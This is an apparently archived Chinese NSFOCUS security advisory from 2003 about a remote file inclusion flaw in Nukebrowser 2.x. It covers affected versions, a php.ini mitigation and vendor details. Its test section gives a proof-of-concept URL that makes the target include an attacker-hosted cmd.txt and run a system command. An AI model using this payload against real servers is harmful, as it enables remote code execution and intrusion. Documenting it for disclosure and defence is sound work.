首页 -> 安全研究

安全研究

安全漏洞
Nukebrowser远程包含漏洞

发布日期:2003-01-30
更新日期:2003-02-03

受影响系统:
Nukebrowser Nukebrowser 2.5
Nukebrowser Nukebrowser 2.41
Nukebrowser Nukebrowser 2.3
Nukebrowser Nukebrowser 2.20
Nukebrowser Nukebrowser 2.11
Nukebrowser Nukebrowser 2.1
描述:
BUGTRAQ  ID: 6731

Nukebrowser是一个用PHP写的CGI程序。

Nukebrowser的nukebrowser.php脚本文件存在漏洞,远程攻击者可以包含其它服务器上的任意文件执行系统命令。

远程攻击者可以在其控制的服务器上上传一个恶意PHP指令的文件,然后在URL的参数里引用包含这个恶意脚本文件,就可以在受影响服务器上执行任意命令。

<*来源:Havenard (havenard@hotmail.com
  
  链接:http://200.162.233.102/havenard/pnw/downloads/tutorials/nukebrowserbug.txt
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Havenard (havenard@hotmail.com)提供了如下测试方法:

http://[victim]/nukebrowser.php?filnavn=http://www.site.com&filhead=http://[web hosting]/cmd.txt&cmd=id

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 修改php.ini的配置,设置:

allow_url_fopen = off
register_globals = off

然后重启web服务器。

厂商补丁:

Nukebrowser
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://lophas.phpwebhosting.com/nukebrowser.php

浏览次数:2819
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障